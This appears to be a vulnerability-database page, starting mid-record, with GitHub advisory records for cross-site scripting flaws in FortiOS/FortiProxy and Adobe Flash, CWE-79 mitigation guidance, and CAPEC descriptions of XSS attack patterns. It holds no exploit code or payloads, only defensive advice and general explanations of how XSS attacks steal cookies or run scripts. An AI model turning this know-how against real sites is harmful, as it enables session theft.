      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4678-X95M-C2HF

Vulnerability from github – Published: 2025-03-14 12:32 – Updated: 2025-03-14 12:32
VLAI
Details

An improper neutralization of input during web page Generation vulnerability [CWE-79] in FortiOS version 7.4.3 and below, version 7.2.7 and below, version 7.0.13 and below and FortiProxy version 7.4.3 and below, version 7.2.9 and below, version 7.0.16 and below web SSL VPN UI may allow a remote unauthenticated attacker to perform a Cross-Site Scripting attack via a malicious samba server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-26006"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-14T10:15:14Z",
    "severity": "HIGH"
  },
  "details": "An improper neutralization of input during web page Generation vulnerability [CWE-79] in FortiOS version 7.4.3 and below, version 7.2.7 and below, version 7.0.13 and below and FortiProxy version 7.4.3 and below, version 7.2.9 and below, version 7.0.16 and below web SSL VPN UI may allow a remote unauthenticated attacker to perform a Cross-Site Scripting attack via a malicious samba server.",
  "id": "GHSA-4678-x95m-c2hf",
  "modified": "2025-03-14T12:32:01Z",
  "published": "2025-03-14T12:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26006"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.fortinet.com/psirt/FG-IR-23-485"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-467C-77HQ-3QWX

Vulnerability from github – Published: 2022-05-14 04:04 – Updated: 2022-05-14 04:04
VLAI
Details

Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-0533"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-06-11T10:57:00Z",
    "severity": "MODERATE"
  },
  "details": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK \u0026 Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.",
  "id": "GHSA-467c-77hq-3qwx",
  "modified": "2022-05-14T04:04:15Z",
  "published": "2022-05-14T04:04:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0533"
    },
    {
      "type": "WEB",
      "url": "http://helpx.adobe.com/security/products/flash-player/apsb14-16.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00021.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-updates/2014-06/msg00029.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-updates/2014-06/msg00030.html"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2014-0745.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/58390"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/58465"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/58585"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/59053"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/59304"
    },
    {
      "type": "WEB",
      "url": "http://security.gentoo.org/glsa/glsa-201406-17.xml"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/67974"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1030368"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation MIT-4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
  • Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Mitigation
Implementation Architecture and Design
  • Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
  • For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
  • Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:
  • etc. Note that HTML Entity Encoding is only appropriate for the HTML body.
  • Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
  • HTML body
  • Element attributes (such as src="XYZ")
  • URIs
  • JavaScript sections
  • Cascading Style Sheets and style property
Mitigation MIT-6
Architecture and Design Implementation

Strategy: Attack Surface Reduction

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation MIT-27
Architecture and Design

Strategy: Parameterization

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Mitigation MIT-30.1
Implementation

Strategy: Output Encoding

  • Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
  • The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
Mitigation MIT-43
Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Mitigation MIT-31
Implementation

Strategy: Attack Surface Reduction

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.
  • Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.
  • Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.
  • Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
Mitigation MIT-21
Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

Mitigation MIT-16
Operation Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

CAPEC-209: XSS Using MIME Type Mismatch

An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.

CAPEC-588: DOM-Based XSS

This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.

CAPEC-591: Reflected XSS

This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is "reflected" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application.

CAPEC-592: Stored XSS

An adversary utilizes a form of Cross-site Scripting (XSS) where a malicious script is persistently "stored" within the data storage of a vulnerable web application as valid input.

CAPEC-63: Cross-Site Scripting (XSS)

An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.